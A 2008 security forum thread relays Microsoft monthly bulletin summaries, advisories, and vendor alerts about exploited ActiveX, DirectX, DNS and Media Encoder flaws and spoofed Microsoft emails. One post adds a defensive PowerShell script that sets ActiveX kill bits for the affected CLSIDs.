AplusWebMaster
2008-07-11, 17:12
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
ThreatCon is currently at Level 2: Elevated.
Symantec honeypots have captured further exploitation of the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114). Before this event, this exploit was known to be used only in isolated attacks. Further analysis of these honeypot compromises has revealed that the exploit has been added to a variant of the neosploit exploit kit; it will very likely reach a larger number of victims. This version will compromise vulnerable English versions of Microsoft Windows by downloading a malicious application into the Windows Startup folder. Computers that have Microsoft Access installed are potentially affected by this vulnerability. Customers are advised to manually set the kill bit on the following CLSIDs until a vendor update is available:
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
...For information on setting the kill bit for CLSIDs, see the following: Microsoft Knowledge Base Article 240797 ( http://support.microsoft.com/kb/240797 )
For more information about the vulnerability, see the following: Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114/references )"
[2008.07.11]

Ref: http://www.microsoft.com/TechNet/security/advisory/955179.mspx
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
July 7, 2008

:fear:

AplusWebMaster
2008-07-17, 22:59
FYI...

- http://isc.sans.org/diary.html?storyid=4747
Last Updated: 2008-07-17 18:48:22 UTC - "Microsoft has issued a "Security Bulletin Major Revision" involving its DirectX products. These revisions include the following two previously released bulletins and particularly affect administrative users as the resulting compromise allows the attacker to gain user rights.

MS08-033* - Vulnerabilities in DirectX Could Allow Remote Code Execution (951698) is rated as -critical- and states that DirectX 9.0 was added as affected software. This vulnerability can be exploited through a specially crafted media file.
* http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
Updated: July 16, 2008 - Version: 2.0

MS07-064** - Vulnerabilities in DirectX Could Allow Remote Code Execution (941568) is also rated -critical- and has been updated to reflect DirectX 9.0 and 9.0a as affected software. This vulnerability can be exploited through a specially crafted media file via streaming."
** http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
Updated: July 16, 2008 - Version: 3.0

:fear:

AplusWebMaster
2008-07-26, 12:43
FYI...

Microsoft Security Advisory (956187)
Increased Threat for DNS Spoofing Vulnerability
- http://www.microsoft.com/technet/security/advisory/956187.mspx
July 25, 2008 - "Microsoft released Microsoft Security Bulletin MS08-037* on July 8, 2008, offering security updates to protect customers against Windows Domain Name System (DNS) spoofing attacks. Microsoft released this update in coordination with other DNS vendors who were also similarly impacted. Since the coordinated release of these updates, the threat to DNS systems has increased due to a greater public understanding of the attacks, as well as detailed exploit code being published on the Internet... attacks are likely imminent due to the publicly posted proof of concept..."
* http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Updated: July 25, 2008
Version: 2.2

- http://support.microsoft.com/kb/953230
Last Review: July 25, 2008
Revision: 4.1

- http://securitylabs.websense.com/content/Alerts/3141.aspx
07.25.2008

//

AplusWebMaster
2008-08-02, 04:12
FYI...

- http://securitylabs.websense.com/content/Blogs/3148.aspx
08.01.2008 - "...We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China. There is currently no patch available, but Microsoft has several workarounds listed in their advisory. We recommend setting the killbit for this ActiveX control on all workstations where it is installed.
Vulnerable ActiveX CLSIDs:
* F0E42D50-368C-11D0-AD81-00A0C90DC8D9
* F0E42D60-368C-11D0-AD81-00A0C90DC8D9
* F2175210-368C-11D0-AD81-00A0C90DC8D9
This vulnerability is a simple design flaw, and does not require any complicated exploit code. Attackers are able to compromise remote systems simply by calling methods provided by the Snapshot Viewer ActiveX control. This is very similar to the November 9, 2005 ADODB.Stream vulnerability, which was widely taken advantage of because it was easy to exploit. Luckily, the vulnerable ActiveX control does NOT appear in a default Microsoft Windows installation. It does appear, however, to be included by default with Microsoft Office 2000 - 2003."

- http://www.symantec.com/security_response/threatconlearn.jsp
"The ThreatCon is at level 2. On August 1, 2008, a new attack vector for the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114) was identified being exploited in the wild. This vulnerability is currently unpatched.
Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114 )
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access ( http://www.microsoft.com/technet/security/advisory/955179.mspx )
The new attack vector allows an attacker to install a vulnerable version of the ActiveX control on target systems that did not originally contain the associated software. This is possible because the control is digitally signed and marked safe for scripting by Microsoft. This is known to affect users of Internet Explorer 6. Note that Internet Explorer 7 requires user interaction to confirm the installation of the ActiveX control. As a result of this discovery, we urge all Microsoft Windows users, even those whose systems do not currently have the vulnerable control installed, to set the kill bit on the three CLSIDs associated with Snapshot Viewer.
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
For instructions on how to set the kill bit on an ActiveX control, please see the following article: Microsoft Knowledge Base Article 240797 ( http://support.microsoft.com/kb/240797 )."

:fear:

AplusWebMaster
2008-08-02, 19:40
FYI...

Microsoft Security Advisory (954960)
...WSUS Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
Updated: August 12, 2008

Some computers do not receive updates from the WSUS server
* http://support.microsoft.com/kb/954960
Last Review: August 12, 2008
Revision: 5.0

:fear:

AplusWebMaster
2008-08-08, 11:52
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 7, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on August 12, 2008... (Total of 12)

Critical (7)

Windows 1 Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

IE Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Media Player Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Access Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Excel Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

PowerPoint Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Office Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

Important (5)

Windows 2 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Windows 3 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

OE Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Messenger Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Word Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution
Affected Software: Microsoft Office...

- http://blogs.technet.com/msrc/archive/2008/08/07/august-2008-advance-notification.aspx
August 07, 2008 - "...we are planning to release high-priority, non-security updates on Windows Update and Windows Server Update Services (WSUS) as well as high-priority, non-security updates on Microsoft Update and Windows Server Update Services (WSUS). You can get additional information, in the “Other Information” section of the Advanced Notification..."

//

AplusWebMaster
2008-08-12, 23:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 12, 2008 - "This bulletin summary lists security bulletins released for August 2008..." (Total 11)

Critical (6)

Microsoft Security Bulletin MS08-046
Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954)
- http://www.microsoft.com/technet/security/bulletin/MS08-046.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-045
Cumulative Security Update for Internet Explorer (953838)
- http://www.microsoft.com/technet/security/bulletin/MS08-045.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-041
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
- http://www.microsoft.com/technet/security/bulletin/MS08-041.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-043
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066)
- http://www.microsoft.com/technet/security/bulletin/MS08-043.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-051
Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)
- http://www.microsoft.com/technet/security/bulletin/MS08-051.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-044
Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090)
- http://www.microsoft.com/technet/security/bulletin/MS08-044.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (5)

Microsoft Security Bulletin MS08-047
Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733)
- http://www.microsoft.com/technet/security/bulletin/MS08-047.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-049
Vulnerabilities in Event System Could Allow Remote Code Execution (950974)
- http://www.microsoft.com/technet/security/bulletin/MS08-049.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-048
Security Update for Outlook Express and Windows Mail (951066)
- http://www.microsoft.com/technet/security/bulletin/MS08-048.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS08-050
Vulnerability in Windows Messenger Could Allow Information Disclosure (955702)
- http://www.microsoft.com/technet/security/bulletin/MS08-050.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Microsoft Security Bulletin MS08-042
Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)
- http://www.microsoft.com/technet/security/bulletin/MS08-042.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4876
Last Updated: 2008-08-12 19:06:35 UTC

---
Revised (4):

Microsoft Security Bulletin MS08-022 – Critical
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
• V2.0 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a deployment change for this security update for one issue and a workaround for another. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-033 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
• V2.1 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a change to Microsoft Baseline Security Analyzer (MBSA) 2.1 to correctly detect this update.

Microsoft Security Bulletin MS07-047 - Important
Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782)
- http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
• V2.0 (August 12, 2008): Added Windows XP Service Pack 3 as affected software. This is a detection change only; there were no changes to the binaries. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-040 – Important
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx
• V1.6 (August 12, 2008): Added entry to the Frequently Asked Questions (FAQ) Related to this Security Update to communicate a change in the installation code for the security update for SQL Server 2005 Service Pack 2. This is an installation code change only. There were no changes to the security update binaries.

//

AplusWebMaster
2008-08-13, 15:44
FYI...

Microsoft Security Advisory (953839)
Cumulative Security Update of -ActiveX- Kill Bits
- http://www.microsoft.com/technet/security/advisory/953839.mspx
August 12, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for the following third-party software:
• Aurigma Image Uploader. Aurigma has issued an advisory and an update that addresses vulnerabilities...
http://blogs.aurigma.com/post/2008/03/Official-security-bulletin.aspx ...
• HP Instant Support. HP has issued an advisory and an update that addresses vulnerabilities. Please see the advisory from HP for more information...
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264 ...
...Customers who are interested in learning more about this update should review Microsoft Knowledge Base Article 953839
- http://support.microsoft.com/kb/953839
August 12, 2008

- http://www.microsoft.com/technet/security/advisory/953839.mspx
• August 13, 2008: Updated to include links to HP’s Advisories
"...HP has issued -2- advisories..."
* http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
** http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01439758

:fear:

AplusWebMaster
2008-08-22, 13:50
FYI...

MS08-051 V2.0 Patch issued August 20, 2008
- http://isc.sans.org/diary.html?storyid=4918
Last Updated: 2008-08-22 00:30:51 UTC - "Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051*, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution... Others should check with their patch management vendors. The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates..."

* http://www.microsoft.com/technet/security/bulletin/ms08-051.mspx
• V2.0 (August 20, 2008): ...Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update. Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall..."

:fear:

AplusWebMaster
2008-09-05, 01:37
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-sep.mspx
September 4, 2008 - "...This is an advance notification of security bulletins that Microsoft is intending to release on September 9, 2008 (Total of -4-)...

Critical (4)

Windows Media Player Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows.

Windows Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Messenger, Office, SQL Server, Visual Studio.

Windows Media Encoder Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows.

Office Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

AplusWebMaster
2008-09-09, 03:08
FYI...

Gotcha: IE8 Lock-In With XP SP3
- http://www.wservernews.com/?id=690
Sep 1, 2008 - "...Redmond on its IE blog* warned XP SP3 users that in some circumstances they will not be able to uninstall either SP3 or IE8. This heads-up was similar to an earlier warning in May, when XP SP3 had just been released. Redmond said then that you wouldn't be able to downgrade from IE7 to the older IE6 browser without uninstalling SP3. Jane Maliouta, an IE program manager, gave specifics about this new gotcha, which impacts you when you downloaded and installed IE8 Beta 1 prior to updating XP to SP3. If you then upgrade IE8 to Beta 2, which Redmond unveiled on the 28th, you will be stuck with both IE8 and Windows XP SP3. You will get a warning dialog:
"If you continue, XP SP3 and IE8 Beta 2 will become permanent, you will still be able to upgrade to later IE8 builds as they become available, but you won't be able to uninstall them."
So how to get around this lock-in? First uninstall XP SP3, then uninstall IE8 Beta 1; then reinstall XP SP3 and follow that by installing IE8 Beta 2. Dang, that's a hassle..."
* http://blogs.msdn.com/ie/archive/2008/08/27/upgrading-to-internet-explorer-8-beta-2.aspx

:thud: :fear:

AplusWebMaster
2008-09-09, 22:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-sep.mspx
September 9, 2008 - "The security bulletins for this month are as follows, in order of severity: (Total of -4-)

Critical (4)

Microsoft Security Bulletin MS08-054
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-052
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Office, SQL Server, Visual Studio...

Microsoft Security Bulletin MS08-053
Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-055
Vulnerability in Microsoft Office Could Allow Remote Code Execution (955047)
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---
ISC Analysis:
- http://isc.sans.org/diary.html?storyid=5009
Last Updated: 2008-09-09 17:46:41 UTC

- http://blogs.technet.com/swi/
Sep. 9, 2008

---
MS08-052
- http://secunia.com/advisories/31675/

MS08-053
- http://secunia.com/advisories/31724/

MS08-054
- http://secunia.com/advisories/31726/

MS08-055
- http://secunia.com/advisories/31744/

---
Revisions...

MS08-052:
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
• V2.0 (September 12, 2008): Bulletin updated to add Microsoft Office Project 2002 Service Pack 2, all Office Viewer software for Microsoft Office 2003, and all Office Viewer software for 2007 Microsoft Office System as Affected Software...

MS08-053:
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
• V1.1 (September 10, 2008): Corrected the "Installing without user intervention" and "Installing without restarting" switches in the Security Update Deployment sections for Windows Vista and Windows Server 2008. Also changed "C:\Program Files" to "%programfiles%" in the Workarounds for Windows Media Encoder Buffer Overrun Vulnerability - CVE-2008-3008 commands.

MS08-054:
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
• V1.1 (September 10, 2008): Removed erroneous entry from Mitigating Factors for Windows Media Player Sampling Rate Vulnerability - CVE-2008-2253.

MS08-055:
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
• V1.1 (September 10, 2008): Corrected the installation switches and deployment information for OneNote 2007, and added to the list of non-affected software. Also, updated FAQ entries explaining why this update is offered to systems with non-affected software.

:-(

AplusWebMaster
2008-09-19, 16:54
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
Sep. 19, 2008 - "The ThreatCon is currently at Level 1. Symantec is currently monitoring in-the-wild attacks leveraging the recently patched Windows Media Player ActiveX vulnerability associated with MS08-053. On September 15, 2008, the DeepSight honeynet observed active exploitation of this flaw as part of a web exploit kit. Successful exploitation of this, or any of the other targeted vulnerabilities, will install malicious code on victim computers. For details on the vulnerability, see the following: Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability ( http://www.securityfocus.com/bid/31065 )
We strongly urge all users to apply the patches made available in the MS08-053 security bulletin immediately. Those who cannot do so should set the kill bit on the associated CLSID (A8D3AD02-7508-4004-B2E9-AD33F087F43C) until patches can be applied. For more information and patches, see the Microsoft bulletin: Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution ( http://www.microsoft.com/technet/security/bulletin/MS08-053.mspx )."

:fear:
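
Added example (my own script, not from Symantec, Websense or the Microsoft advisories quoted above): a PowerShell script that checks and sets the ActiveX kill bit for the CLSIDs named in the Snapshot Viewer posts (955179 / MS08-041) and the Windows Media Encoder 9 post (MS08-053). It follows the registry layout described in KB 240797: a key named after the CLSID under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility with a DWORD "Compatibility Flags" whose 0x400 bit is the kill bit. The Wow6432Node path for 32-bit Internet Explorer on 64-bit Windows is assumed from the same guidance and is only touched when it exists. Run it in an elevated session; it ORs the kill bit into any existing flags rather than overwriting them.

```powershell
# Added example: set/verify ActiveX kill bits per KB 240797. Not vendor code.
# Assumptions: 0x400 = kill bit in "Compatibility Flags"; Wow6432Node path for
# 32-bit IE on 64-bit Windows. Requires an elevated PowerShell session.

$KillBitFlag = 0x400
$BasePaths = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'  # assumed 64-bit path
)

# CLSIDs quoted in the advisories above (Snapshot Viewer x3, WM Encoder 9 wmex.dll)
$Clsids = @(
    'F0E42D50-368C-11D0-AD81-00A0C90DC8D9',
    'F0E42D60-368C-11D0-AD81-00A0C90DC8D9',
    'F2175210-368C-11D0-AD81-00A0C90DC8D9',
    'A8D3AD02-7508-4004-B2E9-AD33F087F43C'
)

function Get-CompatFlags {
    param([Parameter(Mandatory)][string]$Key)
    if (-not (Test-Path $Key)) { return $null }
    $p = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $p) { return $null }
    return [int]$p.'Compatibility Flags'
}

function Test-KillBit {
    # True only if the 0x400 bit is already present under this base path
    param([Parameter(Mandatory)][string]$BasePath,
          [Parameter(Mandatory)][string]$Clsid)
    $flags = Get-CompatFlags -Key (Join-Path $BasePath "{$($Clsid)}")
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBitFlag) -eq $KillBitFlag)
}

function Set-KillBit {
    # Creates the CLSID key if needed and ORs 0x400 into existing flags
    param([Parameter(Mandatory)][string]$BasePath,
          [Parameter(Mandatory)][string]$Clsid)
    $key = Join-Path $BasePath "{$($Clsid)}"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $existing = Get-CompatFlags -Key $key
    $new = if ($null -eq $existing) { $KillBitFlag } else { $existing -bor $KillBitFlag }
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
        -Value $new -Force | Out-Null
}

foreach ($base in $BasePaths) {
    # Skip the Wow6432Node hive on 32-bit Windows where it does not exist
    if (-not (Test-Path $base)) { continue }
    foreach ($c in $Clsids) {
        if (Test-KillBit -BasePath $base -Clsid $c) {
            Write-Output ("{0} : kill bit already set under {1}" -f $c, $base)
        } else {
            Set-KillBit -BasePath $base -Clsid $c
            Write-Output ("{0} : kill bit set under {1}" -f $c, $base)
        }
    }
}
```

Once MS08-041 and MS08-053 are applied, the kill bits can stay in place; the patched controls ship under new CLSIDs or are no longer needed in the browser, so blocking the old ones costs nothing. Re-running the script is idempotent because it only reports when the bit is already present.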

AplusWebMaster
2008-10-10, 00:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 9, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on October 14, 2008... (Total of -11-)

Critical (4)

AD Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

IE Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

HIS Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Excel Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Windows 1 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 2 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 3 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Windows 4 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Windows 5 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 6 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Moderate (1)

Office Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Office...

//

AplusWebMaster
2008-10-10, 08:05
FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: October 9, 2008
"Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.
Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code...

:fear:

AplusWebMaster
2008-10-14, 15:24
FYI...

MS e-mail spoofs with malware
- http://blogs.technet.com/msrc/archive/2008/10/13/microsoft-security-e-mail-spoofs-with-malware.aspx
October 13, 2008 - "... While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is -not- a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor... we never, ever, ever send attachments with our security notification e-mails. And, as a matter of company policy, Microsoft will never send you an executable attachment. If you get an e-mail that claims to be a security notification with an attachment, delete it. It is always a spoof..."

:fear::fear:

AplusWebMaster
2008-10-14, 20:22
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 14, 2008
"This bulletin summary lists security bulletins released for October 2008...

Critical (4)

Microsoft Security Bulletin MS08-060
Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
- http://www.microsoft.com/technet/security/Bulletin/MS08-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-058
Cumulative Security Update for Internet Explorer (956390)
- http://www.microsoft.com/technet/security/Bulletin/MS08-058.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-059
Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
- http://www.microsoft.com/technet/security/Bulletin/MS08-059.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Microsoft Security Bulletin MS08-057
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
- http://www.microsoft.com/technet/security/Bulletin/MS08-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Microsoft Security Bulletin MS08-066
Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
- http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-061
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
- http://www.microsoft.com/technet/security/Bulletin/MS08-061.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-062
Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
- http://www.microsoft.com/technet/security/Bulletin/MS08-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-063
Vulnerability in SMB Could Allow Remote Code Execution (957095)
- http://www.microsoft.com/technet/security/Bulletin/MS08-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-064
Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
- http://www.microsoft.com/technet/security/Bulletin/MS08-064.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
- http://www.microsoft.com/technet/security/Bulletin/MS08-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-056
Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
- http://www.microsoft.com/technet/security/Bulletin/MS08-056.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5180
